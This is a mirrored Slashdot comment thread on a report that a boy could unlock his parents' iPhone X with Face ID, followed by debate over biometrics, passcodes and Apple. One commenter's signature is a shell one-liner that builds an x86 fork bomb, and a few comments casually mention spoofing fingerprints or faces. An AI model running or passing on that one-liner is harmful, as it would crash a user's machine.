Slashdot Mirror
10-Year-Old Boy Cracks the Face ID On Both Parents' IPhone X (wired.com)
An anonymous reader writes: A 10-year-old boy discovered he could unlock his father's phone just by looking at it. And his mother's phone too. Both parents had just purchased a new $999 iPhone X, and apparently its Face ID couldn't tell his face from theirs. The unlocking happened immediately after the mother told the son that "There's no way you're getting access to this phone."
Experiments suggest the iPhone X was confused by the indoor/nighttime lighting when the couple first registered their faces. Apple's only response was to point to their support page, which states that "the statistical probability is different...among children under the age of 13, because their distinct facial features may not have fully developed. If you're concerned about this, we recommend using a passcode to authenticate." The boy's father is now offering this advice to other parents. "You should probably try it with every member of your family and see who can access it."
And his son just "thought it was hilarious."
Experiments suggest the iPhone X was confused by the indoor/nighttime lighting when the couple first registered their faces. Apple's only response was to point to their support page, which states that "the statistical probability is different...among children under the age of 13, because their distinct facial features may not have fully developed. If you're concerned about this, we recommend using a passcode to authenticate." The boy's father is now offering this advice to other parents. "You should probably try it with every member of your family and see who can access it."
And his son just "thought it was hilarious."
You're looking at the phone wrong, etc., etc., etc........
The password on my $79 android phone seems to keep it safe...
I wonder, can monozygotic twins unlock each other's phones? That would be even more hilarious.
Explaining how this isn't a big deal face id is not really broken, and bio-metrics aren't the dumbest idea ever.
... and on the front too, not the back.
I.e. you need to give people an option for no security, passcode, fingerprint or FaceID and let them decide on what balance of security and convenience they want.
Right now it seems like the industry is either putting fingerprint scanners on the back or omitting them entirely. It's another example of a useful feature being omitted for mostly aesthetic reasons - i.e. bezel-less displays. Of course it saves on component cost too.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
It IS hilarious. It's legitimately an odd way to authenticate anyway, and less secure than fingerprints, and way less secure than constantly typing annoying passphrases. It should be no surprise that there's endless ways to fool it.
Kids as skeleton keys, that would be so funny if it weren't the security desaster it actually is. What remains to be shown now is that a random group of, say, 10 children with no relation to an iPhonX (previous...) owner has a more than 10% chance of unlocking Face ID.
A World in a Grain of Sand / Heaven in a Wild Flower,
Infinity in the Palm of your Hand / And Eternity in an Hour.
otherwise the police use all these biometric devices against their owners.
"the statistical probability is different...among children under the age of 13, because their distinct facial features may not have fully developed. If you're concerned about this, we recommend using a passcode to authenticate."
So what they're saying is that all you need are a few foam heads with some generic features, and you should be able to unlock any iPhone X out there?
What sort of bullshit security is this? By admitting this, they've basically admitted the entire feature cannot be trusted.
Fingerprint scanner is insecure bullshit.
That's scary, that puts your children at risk at being kidnapped or being brought in by aggressive authorities in an attempt to get access to your device. Parents should rather avoid using this feature altogether.
Yep.
Security by obscurity -> defective.
>> "the iPhone X was confused by the indoor/nighttime lighting"
Security by obscurity. Told you so.
aaaaaaa
I can't get on with fingerprint scanners on the front. The back is where my finger naturally lands as I put my hand in my pocket to get my phone out.
The front feels clunky and means I have to use two hands to unlock my phone.
Biometrics are user-ids, not passwords.
There are three aspects to security: something you are, something you know, something you have. Implement two for rudimentary security, implement all three for good security.
- Something you are: User ID, biometrics, or some other public information that serves to identify the person.
- Something you know: Typically a password, used to prove the identity
- Something you have: Second factor, used to prove that the password and identity were not stolen.
Face-ID and fingerprints are insecure and easily fooled.
Enjoy life! This is not a dress rehearsal.
Try using your thumbprint
You're not really supposed to "unlock" an iPhoneX. The way FaceID is supposed to work, you pick it up from somewhere and when you instinctively look at the screen, it performs its magic and it's ready, no need to put the right finger on a sensor in the right way, or click on anything. After some time, you're probably going to forget it's actually authenticating you. Unfortunately, while in theory quite convenient, this has several drawbacks in terms of security and usability; it's not really a step forward from fingerprint authentication (that in turn has its problems), more of a step aside.
I found a iPhone X on the floor and unlocked it by mooning it. It was creimer's phone.
if biometric security is on the line.
Fingerprint on the back just works nicely. My index finger can easily be positioned onto the sensor when I pick up my phone.
Apple does nothing for security, they make decisions based on consumer complaints. What was the biggest complaint. People don't use pass codes because they are slow and annoying. So Apple created a faster sign in with facial recognition. Of course they throw in some BS about being better, would you really come out and admit its not better security just easier to use? For most people who probably did not use a pass code in the first place because of the annoyance. This is still more effective since more will use it.
Between this, the debacle of iOS 11 and the fact that the Mac lines have been languishing under him, it's clear they need to get rid of him.
And no, replacing him with the woman who runs the retail side is not good for the company no matter how good her number is or how desperately they want to put a woman in charge of the richest company in the world.
At this point, they need a Satya Nadella who can actually get in there, balance both product lines, come up with new ones and reacquire alienated Mac users who've said "I'm not buying this unfixable, glorified iPad that costs $2500-$3000 and has last year's specs." (But hey, it's 1mm thinner!)
Just shows how crap face-id really is, and it also shows how Apple has tested this feature... like not..
I tried it out on my girlfriends phone, didn't like it.
Maybe it's because I have always had the scanner on the back and I'm just not used to it. It feels really unnatural.
Fingerprint on the back just works nicely. My index finger can easily be positioned onto the sensor when I pick up my phone.
I remember when I got the Nexus 6p and thought the same as you. "I could actually use this".
The next day my phone was sitting next to me on my desk charging, and I quickly realized that I couldn't use it without picking it up first. I'd gotten a message from my girlfriend, so I picked it up to unlock it, replied, then set it back down to continue working.
Got a reply... So I picked it back up and answered.
Set it down.
Pick it up.
Set it down.
I turned off fingerprint after that.
Criminals will start using children under the age of 13 to unlock iphones... lol
We laugh now, but we all know that next year's (or the year after's) flagship Android phones will have Face ID.
So if it was confused by lighting does that mean apple outright lied how it works? or is that just fanboys trying to make up excuses? if you have something that operates by infrared dots on your face that supposedly works in dark or light how the fuck do you get confused by lighting conditions.
Tim Cook's claim that FaceID is 20x more accurate than TouchID was kinda ridiculous. It is a neat technology and from what i hear it works well, but it is impossible to have face recognition that doesn't trigger false positives with relative ease. Telling people there's a one in a million chance that FaceID will mistake someone else face with yours is irresponsible.
So you type on your phone with it laying flat on the desk?
Again this is something that just feels unnatural to me, nearly always hold my phone while typing with one hand.
"one-in-a-million chances crop up nine times out of ten."
--Terry Pratchett
$999 fail
Apple officials said "You are holding it wrong, in this case in front of the wrong person."
Don't fight for your country, if your country does not fight for you.
I Bingâ(TM)d your mom, and wish Bing had censored the results. I donâ(TM)t think I can ever unsee that.
Should we just call you "Scatman"?
Will it recognize a picture? The child could grab the family portrait off the coffee table and focus Dad's picture on the camera to gain access.
Or just snap a picture of the persons face whose phone you want access to and then focus that phone on the screen of your iPhone. Has that been tried?
So Apple lied about the probability of someone getting past face unlock?
Second, how can it have been a lighting issue when Face ID supposedly works by IR dot projection (the phone projects an infra red dot pattern which is captured by the camera)
Because tapping your unlock code was even more work? Or is Android so fucked-up that you had one option or the other, but not both?
There has been numerous articles like this now. Apple has already explained that Face ID stores info about a persons face once a successful PIN code is entered to keep up with the users appearance over time. So whats most likely happened again is that the parents give their phones to their kids to try, the Face ID scan first fails and when the parents then put in the correct PIN code the phone stores information about the kids face together with the parents until eventually it learns to accept the kids face too. Read more here, https://www.theverge.com/2017/...
Seriously, what's the point? Any iPhone, Android user at this point should just forget about security for their devices. Any low level government official is nowadays able to unlock those phones instantly. And yeah, don't get me started about this "FBI - Apple" incident a few months ago, which involved some serious Hollywood-quality acting from the Bureau and Apple. You want the highest security for your smartphone? Surprise... you can't. The best you can do is buy an old Motorola from the 90's. If you insist on smartphones and wan't to have them as secure as possible?
1) Buy an old Nexus (4 or 5)
2) Install a pure AOSP rom on it (like LineageOS)
3) Do NOT install anything from Google on it (especially google play services)
4) Install FDroid with microG and off you go
This is not a perfect setup though since most of the hardware relies on Qualcomms closed source drivers but it's as good as it get's. Anything else you might as well leave your phone unlocked or put a cheap pin on it so that you girlfriend isn't able to view your browser history.
If your kid can't unlock your iPhone X, maybe you should have a little chat with your wife.
At least the boy now knows, that the mailman ain't his father.
And his son just "thought it was hilarious."
well, not only his son, i think it is hilarious as well.
On a long enough timeline, the survival rate for everyone drops to zero.
There's a menu on the right. Try turning off "Safe Search".
"If my son had access to my wife's phone and she had that app on it, he could order ice cream for himself whenever he wanted," he says. (Malik was careful to note that Ammar is a "good kid" who isn't likely to take advantage of his access to his mother's phone. Malik also added that Ammar gets the best grades in his class.)
ICE CREAM...yeah right!
How we, parents, want to be deliberately stupid, sometimes.
Try turning off Safe Search in the menu on the right.
as long as you don't have a case on the phone.
There's a menu on the right. Try turning off Safe Search.
If you have to ask that then you have squandered your time on this planet.
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
I've been completely blackballed throughout entire corporations just because of the brand of mouse I chose to buy, or the fact I refuse to use Facebook. If you can't imagine anything in your phone (or not in it, for that matter) that anyone would take offense to, I suggest you either must not use it or you're just really naive. Big companies generally devolve into popularity contests.
I got a new phone a couple months ago & I've still not got around to locking it. I don't have Android pay or whatever set up (these things will make you set up a password). So what? If I lose it or it gets stolen, I call the provider & get the service shut off. It's sure is convenient to use right now. Am I missing something here?
SLOWER TRAFFIC KEEP RIGHT
Think TouchID or FaceID like a lock on your front door. Yes it can be hacked and bypassed. Sometimes in ways you might not expect. It's low grade security. But that isn't the point. The point is to keep out the majority of less determined individuals out while being a reasonable balance between security and convenience for typical usage. If you want greater security there are features (passwords, etc) you can utilize to strengthen the system. Most of the time these are overkill but sometimes they are a very good idea. Anyone expecting TouchID or FaceID to provide iron clad security has incorrect ideas about what they are for and what their limitations are.
C'mon Apple, fix this! My twin brother was able to unlock my phone and certainly neither one of us is under 13!
Yeah, because there is only one way to unlock the phone, its not like if you swipe up it doesn't bring up pattern/pin unlock screen. Talking bullshit you are.
I've been completely blackballed throughout entire corporations just because of the brand of mouse I chose to buy, or the fact I refuse to use Facebook.
Oh bullshit. No corporation will give a shit about what brand of mouse you use unless you are a flaming asshat about it or somehow manage to violate their corporate IT rules. I don't use Facebook either and I have yet to run into a corporation that gives a shit about that even a little bit. Even if what you say is true that sounds like it is you that is the issue.
If you can't imagine anything in your phone (or not in it, for that matter) that anyone would take offense to, I suggest you either must not use it or you're just really naive.
If you work in a workplace that is THAT hypersensitive then I suggest you find a new and better employer. I can confidently say that there is absolutely nothing on or missing from my phone that I'm even a little worried about my coworkers getting offended over. That would be equally true of every employer I've ever worked for which at my age is quite a few of them. I would have some concerns about them getting access to some banking and financial info but that is the worst of it. Nothing there I'm the least bit embarrassed about including the contents of my emails and correspondence. I'm concerned about serious things like identity theft. That's not to say some people don't have some personal things they need to hide sometimes but if access to your phone is a concern then I suggest you keep such data off your phone.
Big companies generally devolve into popularity contests.
If you think that then I think you have serious social issues that no one here can help you with.
That sounds typical Apple, eventually the face scanner will unlock for you and not your wife as it get retrained to your face instead.
Very quickly I discovered it confused mothers with daughters. When our turn to host the pot-luck comes around, our guests used to gather around, let Picassa lose on the collection and laugh and marvel at the same time about its confusion.
sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
Not copulating with co-workers does not constitute swandering your time. Are the floors and the walls of Apple restrooms coated with sticky, partially dried santorum?
Did anyone really expect this to be more than a modern "keypad lock"?
On my first phone, one could lock and unlock the keypad by pressing 0000. This was not security measure, just a way of preventing accidental phone calls.
Face ID is just the modern "keypad lock", the right photo of the person will probably also unlock the phone.
I mean how much faster is facial id over typing a passcode? Probably a fraction of a fraction of one second.
Or is facial id for tards that find it hard to remember more than one password?
Bizarre as this may seem, the manufacturer of the case I use saw fit to include a cutout for the fingerprint reader.
Once again, biometrics showing that they are an almost empty shell.
Look at my phone. It Unlocked! You are the father!
Sent from my TARDIS
It's pretty sad that you have no life, as evidenced by the fact that you think that the only thing you would not want them to know about is copulation with co-workers.
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
Are you my Daddy?
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former.
Unless you're a little bitch that keeps talking shit about coworkers, I don't see the big deal either.
Because only those who know, would never refer to a computational scenario involving hardware or software, as something getting "confused". :| (and she meant it!)
I used to have to work with some gal who would constantly tell users their bios got confused.
"Which parent does little Ammar look more like?"
LK
"Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
Of course, but legally you can, without anything special happening, be compelled to surrender your fingerprints to authorities for any investigation that they deem appropriate, even if you have not been personally convicted of any crime, or even if no crime has actually even occurred. Legally compelling you to surrender your pass code requires going to court first, where you at least have a chance of having a sympathetic judge.
File under 'M' for 'Manic ranting'
I assume you are insinuating that you are a MANLY MAN, and have had much sex with many women and taking videos of all your MANLY conquests.
Congrats, stud.
We've seen on /. tons of examples of people losing their jobs over their opinions and activities. So it seems like there's a few things outside of work that can cost you your job if someone at the job doesn't like what you do outside of work.
When I worked at Dell, our director made me get rid of my IBM Model M.
Given that Dell sells Dell branded keyboards that's hardly shocking. It's reasonable for companies to like their employees to show some brand loyalty for products they use on the job.
As you need to press the home button on the front to awaken the device in the first place, what is the difference between doing that and having the fingerprint recognizer there?
File under 'M' for 'Manic ranting'
How in the world can DuckDuckGo plausibly claim not to track you when they have a settings system that persists between visits?
File under 'M' for 'Manic ranting'
10y old boy ... aka. Arya Stark?
I don't have to press anything on the front of the device to wake it up, I just put my finger on the fingerprint reader and it unlocks and wakes up.
Local cookies and site preferences. You have the choice to clear them when you close your browser rather than keeping them forever.
I was under the impression that we were talking about iphones here... which still need to be woken up to use, even if you don't have fingerprint detection on.
Is your objection that Apple has put the home button on the front of the device in the first place?
File under 'M' for 'Manic ranting'
No they can do what they like! :) I don't own an iPhone for various reasons, one of which being the fingerprint reader is on the front.
To each their own though. That's the best bit about a diverse choice of phones, there's something for everyone. Nexus 5x here and I couldn't be happier with it.
> Both parents had just purchased a new $999 iPhone X, and apparently its Face ID couldn't tell his face from theirs.
The husband must be pretty pleased with that 2000USD investment, since he can now be sure for life that wife didn't sleep with the postman to conceive. Priceless as in Mastercard, I'd say.
Apple claims that the odds of someone being able to unlock your phone with their face is 1 in 1,000,000. That sounds impressive, but with 7.6 billion people in the world, that means there are 7,600 people who can probably unlock your phone. But where do those people probably live? They most likely aren't randomly shuffled throughout the world. They are most likely the people with the same facial features as you - with similar ethnic backgrounds, and very likely, in similar geographic locations. I certainly look similar to the people around me. And I look particular similar to members of my family. I wonder if it would be very difficult for me to intentionally find someone who could unlock the same phone as me.
This is classic Apple. So many excuses for Apple's expensive, broken tech.
I'll save you all some time by listing the next round of excuses. You're looking at it wrong. You're holding it wrong. No, the hardware is fine - it's your kid that's to blame. Your face isn't round enough. Your face is too round.
This young criminal should go to jail and get face change procedure, and parents should pay for it. Poor Apple
>> Fingerprints seem to be pretty good in the real world. The FBI can't seem to crack them. UK security forces can't reliably crack them
That's wrong.
Fingerprints can be reproduced in so many ways it's not even funny.
- from a photo of your fingers 10m away
- from the fingerprints registered in your ID card (depends on your country)
- from the fingerprint you leave on every smooth object you touch, like for example, your smartphone screen
aaaaaaa
Set-Cookie: setting=value
not that I believe them
Looking at the family picture, the boy has his dad's facial features from the cheekbones up, but he's got his mom's smile and chin. This gives us potential insight to how much Apple is weighting various facial features when determining whose face is whose.
Finally, someone uses the correct term instead of the popular, albeit incorrect, "hacks". I can die a happy human.
Well at least this proves the kid is theirs.
Sure, but you could do the same thing with google or any search engine.
File under 'M' for 'Manic ranting'
Mother: "There's no way you're getting access to this phone."
Son: "Hold my juice box."
Don't even need to crack it ...
...his mother and father were also his aunt and uncle.
Yeeeeeehaaaaaa!
Only Apple would tell people their phones are secure when they are demonstrably not.
The courage is truly astounding.
...let me know.